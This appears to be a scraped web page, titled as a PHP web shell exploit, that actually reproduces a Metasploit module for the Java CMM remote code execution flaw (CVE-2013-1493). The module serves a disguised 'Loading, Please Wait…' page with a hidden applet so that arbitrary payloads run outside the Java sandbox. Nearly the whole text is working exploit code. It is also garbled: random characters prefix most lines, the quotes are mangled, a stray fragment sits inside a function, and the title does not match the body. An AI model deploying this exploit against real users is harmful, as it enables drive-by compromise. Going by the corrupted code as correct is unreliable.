STUNSHELL PHP Web Shell远程执行代码

admin

##
  s( I6 x" L+ T( f7 a3 s: x
# This file is part of the Metasploit Framework and may be subject to
; ?8 Q( s/ q& j% _% A# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
0 `# J% H" b0 {8 j2 N# http://metasploit.com/
##
require ‘msf/core’
/ r6 }8 i+ \" I. W/ m! x% Jrequire ‘rex’
class Metasploit3 < Msf::Exploit::Remote
8 {/ A, i7 S$ P4 s" D: vRank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
2 m: V1 d9 r& j3 H5 o8 C* Linclude Msf::Exploit::EXE
2 C" s8 H0 M. O+ |9 \3 [$ _include Msf::Exploit::Remote::BrowserAutopwn
5 g. b3 V# {+ t  f# Jautopwn_info({ :javascript => false })
: S6 k. V7 i) f( F! D- Edef initialize( info = {} )
super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
1 a: {' c5 ?* h+ \# |4 J. TThis module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
7 Z- P- D9 \/ p' P) cand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
$ Q2 V/ b; P# P; d- Vand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
" o3 \: `8 b6 n% h/ nsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
* b9 L8 L9 R, Qwarning in order to run the malicious applet.
& ^1 W' J7 v( l8 q},
‘License’ => MSF_LICENSE,
, ^5 I% }( y, \  a* x/ \6 v0 g‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
. \9 ]4 `0 A9 ~7 {/ m2 z/ q'juan vazquez' # Metasploit module (just ported the published exploit)
1 T  _5 e6 ?6 U4 I" ]: D],
. ?1 E' F* }7 V‘References’ =>
[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
- L6 Q. j: S0 X9 N[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
0 q; e2 S$ c; m' \3 `% _5 q: q],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
; S6 i5 J  C: A; R[ 'Generic (Java Payload)',
2 i2 ]. ?$ K; n{
/ _$ C% f$ O9 d1 i" ~4 {'Platform' => 'java',
'Arch' => ARCH_JAVA
/ F$ x: p$ {+ r# {* C}
  D) D/ _0 p* z/ ~],
[ 'Windows x86 (Native Payload)',
$ M$ r% k4 T% `& z( L9 R' ^{
: V% q( f1 s- G# Q, s: s9 {'Platform' => 'win',
( R8 a; v9 h+ j! Q9 h* ]'Arch' => ARCH_X86
}
]
],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
- R4 m+ C0 i- n8 m& @* Lend
def setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
1 ~9 N( h5 ?* J/ c+ K. i@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% l# {* h% x  R: t& b! Dpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
0 m4 D5 }* i7 M1 W4 w2 h1 Q$ O! ]@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
super
4 p5 Z  t/ E3 k8 d2 F! I' Dend
; h: j; @2 `2 F' edef on_request_uri(cli, request)
) v, c% ?7 h2 ^) f& Tprint_status(“handling request for #{request.uri}”)
+ Q/ O: _, ]6 H' Y8 ]4 Q# gcase request.uri
0 ~+ [7 o: q( J+ dwhen /\.jar$/i
jar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
& b) `  o0 a; {metasploit_str = rand_text_alpha(“metasploit”.length)
% o% ]- t: g# epayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
& D& T, ]* Q! F" O( Yentry.name.gsub!(“Payload”, payload_str)
3 Q$ S, A! @: }4 b! ~entry.data = entry.data.gsub(“metasploit”, metasploit_str)
1 h- m# A& P* e9 Hentry.data = entry.data.gsub(“Payload”, payload_str)
, e4 T; g# l7 w. a" t, s1 U}
: L; x! a8 I1 Q3 Z/ b  Yjar.build_manifest
5 Y2 R! ~) I% ?send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
payload = regenerate_payload(cli)
! @7 H) {$ Z5 H) D8 x/ Fif not payload
0 Y. k+ w, q9 _$ W0 Mprint_error(“Failed to generate the payload.”)
" ~+ b+ F8 C' n. Y# K. D, Qsend_not_found(cli)
return
- A3 Z# s0 Y6 g4 T4 O! send
" k; J6 w+ H, \2 v6 v( C) F; Gsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
end
$ h! c# ~" B' O' C; o: Iend
def generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
1 h' z3 Z8 v0 }. \3 `  b$ D" {9 _html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
2 E3 o8 Q  F/ c, \  @html += %Q|</applet></body></html>|
return html
7 x( f7 h4 g% X. H6 o# send
end
end
* Z! J) U1 }7 D- `2 U